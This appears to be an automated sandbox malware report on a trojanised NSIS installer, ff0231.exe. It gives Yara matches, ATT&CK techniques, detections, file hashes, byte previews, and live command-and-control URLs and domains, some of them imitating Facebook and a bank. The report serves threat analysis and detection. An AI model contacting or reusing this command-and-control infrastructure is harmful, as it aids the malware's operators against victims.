Source: Yara match	File source: 3.0.ff0231.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ff0231.exe.2920000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.ff0231.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.ff0231.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ff0231.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.ff0231.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ff0231.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.ff0231.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.ff0231.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000000.706889621.000000000F2F4000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.730860084.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1195175405.00000000031A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000001.676423875.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.675874776.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.731603632.0000000000D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1194078465.0000000000D80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.731581465.0000000000CD0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.679018154.0000000002920000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1195210641.00000000031D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.720796020.000000000F2F4000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.674213587.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Path Interception	Process Injection612	Deobfuscate/Decode Files or Information1	Input Capture1	File and Directory Discovery2	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer3	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Shared Modules1	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Obfuscated Files or Information3	LSASS Memory	System Information Discovery113	Remote Desktop Protocol	Input Capture1	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Software Packing1	Security Account Manager	Query Registry1	SMB/Windows Admin Shares	Clipboard Data1	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	File Deletion1	NTDS	Security Software Discovery171	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading1	LSA Secrets	Virtualization/Sandbox Evasion2	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Virtualization/Sandbox Evasion2	Cached Domain Credentials	Process Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection612	DCSync	Application Window Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Rundll321	Proc Filesystem	Remote System Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
ff0231.exe	34%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsoCFAB.tmp\xavjqrgsngv.dll	100%	Avira	HEUR/AGEN.1134255
C:\Users\user\AppData\Local\Temp\nsoCFAB.tmp\xavjqrgsngv.dll	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.2.ff0231.exe.10000000.2.unpack	100%	Avira	HEUR/AGEN.1134255	Download File
3.0.ff0231.exe.400000.3.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
3.0.ff0231.exe.400000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
0.2.ff0231.exe.2920000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
16.0.explorer.exe.744f840.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
9.2.rundll32.exe.3434480.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
9.2.rundll32.exe.550f840.4.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
3.1.ff0231.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
3.2.ff0231.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
3.0.ff0231.exe.400000.0.unpack	100%	Avira	TR/Patched.Ren.Gen2	Download File
16.0.explorer.exe.744f840.3.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
3.0.ff0231.exe.400000.2.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.comptesgratuit.fr/fh3c/?7nhH=Hxl0d2MH-t9Hyv&z0GdXd=ygpAwtep7WxWCgU1n5iY5amVcELu0tSIdE/9Y9Jyy4nkdNu97XXXbghTbpjnrxNYSyQT	0%	Avira URL Cloud	safe
http://www.teslaislandboys.com/fh3c/?7nhH=Hxl0d2MH-t9Hyv&z0GdXd=n2wKPxZ8pCyDi97rnXro6S5Jba3+KYmZJcqoataOVa/Ib+/xmeU19xREWNmNK15lIZxN	0%	Avira URL Cloud	safe
http://cirn.one	0%	Avira URL Cloud	safe
http://www.evchargeoracle.com/fh3c/?z0GdXd=TEDmW6iEX7An5lAq1gB0cQiS4L3buUHqtO3o3qqMncoo4GVsMboScKfxnSemig/wshnV&7nhH=Hxl0d2MH-t9Hyv	0%	Avira URL Cloud	safe
www.prometaly.fr/fh3c/	0%	Avira URL Cloud	safe
http://www.facebook-meta.net/fh3c/?z0GdXd=WoHcE9GCxXT7wUBgkc+2l4Z3+m1n5nn1xCnIHBmko3viCo3Igm4+Oh54SxcB0NGJBR7p&7nhH=Hxl0d2MH-t9Hyv	0%	Avira URL Cloud	safe
http://www.schuette.tech/fh3c/?z0GdXd=N2vEI1OX7w/3udy+ydCYc971PZER2FJlK1gZL6lMnGSu15qwd848spLio4s8j+VNLmhX&7nhH=Hxl0d2MH-t9Hyv	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.comptesgratuit.fr	185.53.178.54	true	true	unknown
www.schuette.tech	5.9.96.94	true	true	unknown
evchargeoracle.com	34.102.136.180	true	false	unknown
ghs.googlehosted.com	142.250.203.115	true	false	unknown
facebook-meta.net	15.197.142.173	true	true	unknown
meta-facebook.life	34.102.136.180	true	false	unknown
www.facebook-meta.net	unknown	unknown	true	unknown
www.teslaislandboys.com	unknown	unknown	true	unknown
www.evchargeoracle.com	unknown	unknown	true	unknown
www.meta-facebook.life	unknown	unknown	true	unknown
www.chasesecurobanking.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.comptesgratuit.fr/fh3c/?7nhH=Hxl0d2MH-t9Hyv&z0GdXd=ygpAwtep7WxWCgU1n5iY5amVcELu0tSIdE/9Y9Jyy4nkdNu97XXXbghTbpjnrxNYSyQT	true	Avira URL Cloud: safe	unknown
http://www.teslaislandboys.com/fh3c/?7nhH=Hxl0d2MH-t9Hyv&z0GdXd=n2wKPxZ8pCyDi97rnXro6S5Jba3+KYmZJcqoataOVa/Ib+/xmeU19xREWNmNK15lIZxN	false	Avira URL Cloud: safe	unknown
http://www.evchargeoracle.com/fh3c/?z0GdXd=TEDmW6iEX7An5lAq1gB0cQiS4L3buUHqtO3o3qqMncoo4GVsMboScKfxnSemig/wshnV&7nhH=Hxl0d2MH-t9Hyv	false	Avira URL Cloud: safe	unknown
www.prometaly.fr/fh3c/	true	Avira URL Cloud: safe	low
http://www.facebook-meta.net/fh3c/?z0GdXd=WoHcE9GCxXT7wUBgkc+2l4Z3+m1n5nn1xCnIHBmko3viCo3Igm4+Oh54SxcB0NGJBR7p&7nhH=Hxl0d2MH-t9Hyv	true	Avira URL Cloud: safe	unknown
http://www.schuette.tech/fh3c/?z0GdXd=N2vEI1OX7w/3udy+ydCYc971PZER2FJlK1gZL6lMnGSu15qwd848spLio4s8j+VNLmhX&7nhH=Hxl0d2MH-t9Hyv	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nsis.sf.net/NSIS_Error	ff0231.exe	false		high
http://nsis.sf.net/NSIS_ErrorError	ff0231.exe	false		high
http://cirn.one	rundll32.exe, 00000009.00000002.1196803684.00000000059FF000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
5.9.96.94	www.schuette.tech	Germany	24940	HETZNER-ASDE	true
142.250.203.115	ghs.googlehosted.com	United States	15169	GOOGLEUS	false
185.53.178.54	www.comptesgratuit.fr	Germany	61969	TEAMINTERNET-ASDE	true
15.197.142.173	facebook-meta.net	United States	7430	TANDEMUS	true
34.102.136.180	evchargeoracle.com	United States	15169	GOOGLEUS	false

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	528603
Start date:	25.11.2021
Start time:	14:49:32
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 11s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	ff0231.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	29
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@8/2@7/5
EGA Information:	Failed
HDC Information:	Successful, ratio: 25.7% (good quality ratio 22.9%) Quality average: 73.9% Quality standard deviation: 32.7%
HCA Information:	Successful, ratio: 92% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe Override analysis time to 240s for rundll32
Warnings:	Show All Exclude process from analysis (whitelisted): SearchUI.exe, BackgroundTransferHost.exe, WerFault.exe, ShellExperienceHost.exe, backgroundTaskHost.exe, svchost.exe, mobsync.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 23.211.6.115 Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, s-ring.msedge.net, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, teams-ring.msedge.net, arc.msn.com, t-ring.msedge.net Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtEnumerateKey calls found. Report size getting too big, too many NtEnumerateValueKey calls found. Report size getting too big, too many NtOpenFile calls found. Report size getting too big, too many NtOpenKey calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:51:32	API Interceptor	1477x Sleep call for process: explorer.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
185.53.178.54	nHSmNKw7PN.exe	Get hash	malicious	Browse	www.wwwdonefirst.com/s3f1/?5jWDs4dH=dwBTA4299uw2O0ZcwDeYVSsI1YYyH04irTIlcPCwTSanFjgcq0N904+lL5CsabkTalP3&7nrhh=6lJxyBlHwBydl
	rEC0x536o5.exe	Get hash	malicious	Browse	www.wwwdonefirst.com/s3f1/?XZeT=dwBTA424gp0zMkYmsTeYVSsI1YYyH04irTIlcPCwTSanFjgcq0N904+lL6CzZfAoamqz&0F=WpRPnJOxwpbl
	safecrypt.exe	Get hash	malicious	Browse	educarpetas.com/modules/mod_fxprev/libraries/mzsys.php
	Confirmation copy 112WSDGB.exe	Get hash	malicious	Browse	www.creditoefectivo.info/3iw/?k2JLtP=m78xn5oMN8wnMfaX70UQPP8GL31woTtozaaF8RlJKmGfLr7wp/RwXdgcuT/KgNqIW69L&OZQliB=H0Dlqv
	Quote111.exe	Get hash	malicious	Browse	www.apowersof.com/r7m/
15.197.142.173	Product Inquiry.exe	Get hash	malicious	Browse	www.stardustfuel.com/b62n/?w6t8Rd=8pS0d&B2JpMvPH=bitkT+fROZ7YJ9W3KAHG3F4NaeEWJ/bItHZCVIRvEyCJsKwhffepXYuB3OLc5bMX6VUM
	SEOCHANG INDUSTRY.exe	Get hash	malicious	Browse	www.americanherosinhomes.com/g0d1/?PVqHRfO8=IIxwvy6vPNID/JRo91xi/yyH4Ut0VDSWiPDwTP94eIsVoSBsqXX0W8vuDn+cPFkH9oxp&w4t=oTrhAdIpjTztoLMP
	TWb3IVgBOQ.exe	Get hash	malicious	Browse	www.changemylifefast.info/hno0/?w6ehz=Zp9xCdu8GlLPM&WrK8Rx=CF3DhNgK0Ag4BqjGd158uXI+U+aJx3nYqVq5WtRUiA0cYMiW5lbUY0Xs6/OLdoeu3QMK
	Payment Advice.doc	Get hash	malicious	Browse	www.educacaosemdistancia.net/cy88/?JpCxc=JmlLW4tvo01r9wrX9Y8//aPMS7/0SdnIxOVR2KDxToJX/qIBq1GB4VVt6JTuNPN33T7huQ==&9rl=-Z8xBfo8a6
	Purchase Order.exe	Get hash	malicious	Browse	www.trademarkitforyourself.com/ea0r/?MhWlux=21seA+p01ssf89XpJwqli0pikByiP5XpNgEnRo49H7oUDIWfwqQ0H/rxTS4hZj8yuvzP&f0=V6bxR6kX9Fl
	wE3YzRd1IZ.exe	Get hash	malicious	Browse	www.openseasports.com/rf5o/?1bl0d=prWeMxx2/BJC8sZlWIZpuyeKImgRxWld8vjsHWTu2wXn9x/67v1vcr6/npQpmgVn2079&oJBp=aP_Tvbk8o00d
	Payment Advice Note 22.11.2021.xlsx	Get hash	malicious	Browse	www.changemylifefast.info/hno0/?o4M=CF3DhNgP0Hg8B6vKf158uXI+U+aJx3nYqVypKuNVmg0dY9OQ+1KYOwvu5aidZ4ad8TR6Ag==&e6A=1bpXIfxPILSXN
	Case File.exe	Get hash	malicious	Browse	www.peacepresidentunited.com/l3ld/?eZ=3DHpXRrikPOAkXru5TUZOW4pCT6+NLGlHc+63BSGXSeyPyFyAdMUnw+8fECV6bE4ErQK&_txT=KnTHszYptz8Xj
	New Order 000112221.exe	Get hash	malicious	Browse	www.harryrowlandart.com/ng6c/?0D=jj5WxJ6n4aa6IlRMblKQ7JpJDQ1gceCDPWmy+4CGzg6l4ujyqequ6uWXomAkuFwU5N28&DX0h1=LzrpLJ
	Purchase Order 2890.exe	Get hash	malicious	Browse	www.getcashdaily.info/pqbu/?qZX8=3fyt8XTxqnth9J80&Czu=jUfn6ErcHqcbElE4rZAxR0AveVXCfELwEyyNoBxvG7pT7x/tWqpSpT0RR+Q3cRxq6Jvi
	Documents AWB # 3406506482.exe	Get hash	malicious	Browse	www.medalofhonor.store/hd6y/?-ZkD=9rMxI2yHNbApH&dBZpKxr=1Az7q3/zqE8BmPYNTkMghFBQ9EnepZBZu2ie3xKuOm5gjgEKeg+MNAAqucf3JIiNFPPg
	Purchase Order 01001402.exe	Get hash	malicious	Browse	www.trademarkitforyourself.com/ea0r/?XXqL=21seA+p01ssf89XpJwqli0pikByiP5XpNgEnRo49H7oUDIWfwqQ0H/rxTS4hZj8yuvzP&z0GpfL=6ly81h2x6804
	SecuriteInfo.com.Trojan.Siggen15.46065.1499.exe	Get hash	malicious	Browse	www.3leadsaday.xyz/b62n/?k0GX=dXGVSQLW5UV0LxKdq6CciJ5B/MsvTz/5XJGW3Thr/uV7UvH1o1ffqu8+T8hxn9Zbc49u&VpCHN=7n-xClkP8D_
	NICHIDEN VIET NAM - PRODUCTS LIST.exe	Get hash	malicious	Browse	www.navasoft.net/bus9/?W2JXG=qRD1jnwXdkKa66VSVedd9Ert/MobnFaU7VUy36VcXQLRN6VNbM/mx/6j/GLWcSM04v1m&j2Jp=hDKXMVyHSPkx
	doc028750_029.exe	Get hash	malicious	Browse	www.naturesownwaterservices.com/s4st/?aN90b=KVyLR83p1hG&Bz=5g5jOeR1wbvssk/2SAJebfog4cawfO/fKX98IMBMmiT/h5dg8c5JgGOZkuHFmNozoRJa
	OVER DUE INVOICE & PAYMENT SUB FORM.exe	Get hash	malicious	Browse	www.navasoft.net/bus9/?Ct9Tot=qRD1jnwXdkKa66VSVedd9Ert/MobnFaU7VUy36VcXQLRN6VNbM/mx/6j/GLWcSM04v1m&6ltpK=f2MXFH_pTNOlhrsp
	4C0P93ko4u.exe	Get hash	malicious	Browse	www.shopkyrobak.com/s564/?3fRLM=ncyUo/pT3NPrubbbiuUxyJBf/K1YAbxGyQQpSZPZeDvv8usWq6eFmdaasFSgyTnKMPfakxGS1Q==&j0Ddo=7n-tJLsh8h
	Purchase_Order_#202201.exe	Get hash	malicious	Browse	www.navasoft.net/bus9/?bL0hB43=qRD1jnwXdkKa66VSVedd9Ert/MobnFaU7VUy36VcXQLRN6VNbM/mx/6j/FrGTzcMmKch&EXSD=KB6X_LnX4pALP
	Remittance.doc	Get hash	malicious	Browse	www.educacaosemdistancia.net/cy88/?8p=LR-L&eN6=JmlLW4tvo01r9wrX9Y8//aPMS7/0SdnIxOVR2KDxToJX/qIBq1GB4VVt6JTuNPN33T7huQ==
	0p15gTcRwy.exe	Get hash	malicious	Browse	www.gametimebg.com/s18y/?iPyhQ=GeiSqwLlSN+1zUZfxgrVpi5RTxjNzp5rk1pIsxOITRUXGXjooHIaUMTgitSeSdRnfDk4&gRTlZ=2dI8_P1H

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
HETZNER-ASDE	MakbLShaqA.dll	Get hash	malicious	Browse	78.47.204.80
	MakbLShaqA.dll	Get hash	malicious	Browse	78.47.204.80
	Zr26f1rL6r.exe	Get hash	malicious	Browse	88.99.22.5
	OPKyR75fJn.exe	Get hash	malicious	Browse	5.9.162.45
	meerkat.arm7	Get hash	malicious	Browse	148.251.220.118
	oQANZnrt9d	Get hash	malicious	Browse	135.181.142.151
	tUJXpPwU27.dll	Get hash	malicious	Browse	78.47.204.80
	LZxr7xI4nc.exe	Get hash	malicious	Browse	5.9.162.45
	3E8869030B9C89B8C43E9F8A6730A516E3945AB1272E3.exe	Get hash	malicious	Browse	5.9.162.45
	5A15ECE1649A5EF54B70B95D9D413BAD068B8C1C932E2.exe	Get hash	malicious	Browse	5.9.162.45
	23062BA932165210EBB3FFCD15474E79F19E6AD74869F.exe	Get hash	malicious	Browse	5.9.162.45
	exe.exe	Get hash	malicious	Browse	116.202.203.61
	J73PTzDghy.exe	Get hash	malicious	Browse	94.130.138.146
	piPvSLcFXV.exe	Get hash	malicious	Browse	88.99.210.172
	fkYZ7hyvnD.exe	Get hash	malicious	Browse	116.202.14.219
	.#U266bvmail-478314QOZVOYBY30.htm	Get hash	malicious	Browse	168.119.38.214
	pYebrdRKvR.dll	Get hash	malicious	Browse	78.47.204.80
	pPX9DaPVYj.dll	Get hash	malicious	Browse	78.47.204.80
	wUKXjICs5f.dll	Get hash	malicious	Browse	78.47.204.80
	cRC6TZG6Wx.dll	Get hash	malicious	Browse	78.47.204.80
TEAMINTERNET-ASDE	xDG1WDcI0o.exe	Get hash	malicious	Browse	185.53.179.92
	nHSmNKw7PN.exe	Get hash	malicious	Browse	185.53.178.54
	PjvBTyWpg6.exe	Get hash	malicious	Browse	185.53.177.20
	Telex.exe	Get hash	malicious	Browse	185.53.177.53
	rEC0x536o5.exe	Get hash	malicious	Browse	185.53.178.54
	Tax payment invoice - Wd, November 17, 2021,pdf.exe	Get hash	malicious	Browse	185.53.179.90
	PO_ MOQ883763882.doc	Get hash	malicious	Browse	185.53.178.12
	Order Specification.doc	Get hash	malicious	Browse	185.53.178.12
	29383773738387477474774.exe	Get hash	malicious	Browse	185.53.177.53
	Tax payment invoice - Wed, November 10, 2021,pdf.exe	Get hash	malicious	Browse	185.53.179.90
	Factura_842.pdf.exe	Get hash	malicious	Browse	185.53.178.50
	Draft shipping docs CI+PL.xlsx	Get hash	malicious	Browse	185.53.177.10
	32vCkFTS0X.exe	Get hash	malicious	Browse	185.53.179.94
	61Wq3BOwiA.exe	Get hash	malicious	Browse	185.53.178.51
	Order Information.exe	Get hash	malicious	Browse	185.53.179.94
	lCFjxhAqu3.exe	Get hash	malicious	Browse	185.53.178.10
	2FNlQLySZS.exe	Get hash	malicious	Browse	185.53.178.13
	o4EjNRKCKq.exe	Get hash	malicious	Browse	185.53.178.30
	tgSQwVSEzE.exe	Get hash	malicious	Browse	185.53.177.12
	draft shipping docs CI+PL.xlsx	Get hash	malicious	Browse	185.53.177.10
TANDEMUS	Product Inquiry.exe	Get hash	malicious	Browse	15.197.142.173
	meerkat.arm7	Get hash	malicious	Browse	128.88.223.189
	SEOCHANG INDUSTRY.exe	Get hash	malicious	Browse	15.197.142.173
	TWb3IVgBOQ.exe	Get hash	malicious	Browse	15.197.142.173
	Payment Advice.doc	Get hash	malicious	Browse	15.197.142.173
	Purchase Order.exe	Get hash	malicious	Browse	15.197.142.173
	wE3YzRd1IZ.exe	Get hash	malicious	Browse	15.197.142.173
	Payment Advice Note 22.11.2021.xlsx	Get hash	malicious	Browse	15.197.142.173
	Case File.exe	Get hash	malicious	Browse	15.197.142.173
	New Order 000112221.exe	Get hash	malicious	Browse	15.197.142.173
	Purchase Order 2890.exe	Get hash	malicious	Browse	15.197.142.173
	Documents AWB # 3406506482.exe	Get hash	malicious	Browse	15.197.142.173
	Purchase Order 01001402.exe	Get hash	malicious	Browse	15.197.142.173
	sora.x86	Get hash	malicious	Browse	128.88.62.127
	SecuriteInfo.com.Trojan.Siggen15.46065.1499.exe	Get hash	malicious	Browse	15.197.142.173
	NICHIDEN VIET NAM - PRODUCTS LIST.exe	Get hash	malicious	Browse	15.197.142.173
	doc028750_029.exe	Get hash	malicious	Browse	15.197.142.173
	OVER DUE INVOICE & PAYMENT SUB FORM.exe	Get hash	malicious	Browse	15.197.142.173
	4C0P93ko4u.exe	Get hash	malicious	Browse	15.197.142.173
	Purchase_Order_#202201.exe	Get hash	malicious	Browse	15.197.142.173

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\2wyt68ql38qw Download File
Process:	C:\Users\user\Desktop\ff0231.exe
File Type:	data
Category:	dropped
Size (bytes):	215058
Entropy (8bit):	7.992809468929609
Encrypted:	true
SSDEEP:	6144:hHwRmYLnGNUS9D0XtB2jI6MCiv9ulTnM22FTJ:thYSx9D8CTLnzMDF9
MD5:	AD14EFC487C65587B5B384473F921CD2
SHA1:	F7EBC52A9A0AF9CC44664E888906033D1AF9CDB3
SHA-256:	A7ACECC70EA2D62881EFC39E3F5EB4DB3844CDA900CEFA48AAEC48551D273347
SHA-512:	FD160F86A1C166A40FD2CDF4939934FCAC674BD12450EDC5BBA6630981E2AEB41B9CE7189D5D5E1F206C12E84F775358C8B1AE95C89D3B60CCA4ECD0C0B3AC37
Malicious:	false
Reputation:	low
Preview:	......L1.:....Gi..{..<......Tb.9.../....!1...?ds.";g.......=.^...Ro....AJ=.Y..H.24`.....;...;0...&...-....4Q0ol...uK.Hv.....ZGu...:.......3...T..zd.."i.N.AMc.5q.....>.....U.S....._.....J..;i)....k.h......Y/.q....Qrl..z<...h.i.......s..T.K&..{.1.>.L1......a0@..{...#.R..`.\..9...t.....1.s.?ds.".g.......=..H.R.w[...%.K.z...<.m....#...' .......7.8}..z..AK.&.K.Hv....O~..JB.."d..u...3%..F.d....S.........n@].D-...U.S...S.......{,.)......h...m....Pq%%.Qrl..z<.....io......s.-T..&...{.1s.>.L1.....a0@cb{..#.R....Tb.9.../....!1...?ds.";g.......=..H.R.w[...%.K.z...<.m....#...' .......7.8}..z..AK.&.K.Hv....O~..JB.."d..u...3%..F.d....S.........n@].D-...U.S....._....:J.{..)...k.h...m....Pq.%..Qrl..z<.....io......s.-T..&...{.1s.>.L1.....a0@cb{..#.R....Tb.9.../....!1...?ds.";g.......=..H.R.w[...%.K.z...<.m....#...' .......7.8}..z..AK.&.K.Hv....O~..JB.."d..u...3%..F.d....S.........n@].D-...U.S....._....:J.{..)...k.h...m....Pq.%..Qrl..z<.

C:\Users\user\AppData\Local\Temp\nsoCFAB.tmp\xavjqrgsngv.dll Download File
Process:	C:\Users\user\Desktop\ff0231.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	88576
Entropy (8bit):	6.395867437606634
Encrypted:	false
SSDEEP:	1536:cTa5ekdu7Mw7zZUJBiQFVcbiFqK8/baPbUfskExk:cTOrdu7MQk3XcbiFGQxx
MD5:	27E639F08ED217F528FFF9EEC80A4FF5
SHA1:	0FB150A7CDCF24403FC9D4463E38CC1549CC4786
SHA-256:	E7422D8679E6F47B4E68B638A8501E665E26765381EE0812FC909728D7052961
SHA-512:	F5E1CA240D0795B0878D7F851AD770C06AD67046CB80781F9DFCAF79E90DCC097969DA71B19440A467AEC2850060D37CF1C4263CD872683A37766D4AFD80B421
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....R.a...........!.........t.......................................................................................Q..N....Q......................................................................P...H...........HT...............................text............................... ..`.rdata..._.......`..................@..@.data...(....`.......F..............@....rsrc................X..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.928760560009552
TrID:	Win32 Executable (generic) a (10002005/4) 92.16% NSIS - Nullsoft Scriptable Install System (846627/2) 7.80% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	ff0231.exe
File size:	291150
MD5:	b2bdb06e477be0fc87f7bbd744ff7d38
SHA1:	521e91257dfee2420e66af761f8ef631611a8149
SHA256:	3e1840a0f24371b46b7e196c6c04cba6f218c1989edd4d0eadc540e0b4ef17f7
SHA512:	4533d1ea041ccaa518e5342c143afcbb091959baa9e88f6c05db58c88cf6672b95c899ec8812b21d63f453452d82aa9bc09c79b111c0f8344f1573e8be2474eb
SSDEEP:	6144:rGibxCiJisiznt3+aXctz315IIa8s3v9ulTnM22WaH0n7LWlVbn9/+0QmAi:5FJFiJVc2IpzMDWaH0XW7n9/0mr
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................\...........0.....

File Icon


Icon Hash:	b2a88c96b2ca6a72

Static PE Info

General
Entrypoint:	0x4030e3
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x48EFCDCD [Fri Oct 10 21:49:01 2008 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	7fa974366048f9c551ef45714595665e

Entrypoint Preview

Instruction
sub esp, 00000180h
push ebx
push ebp
push esi
xor ebx, ebx
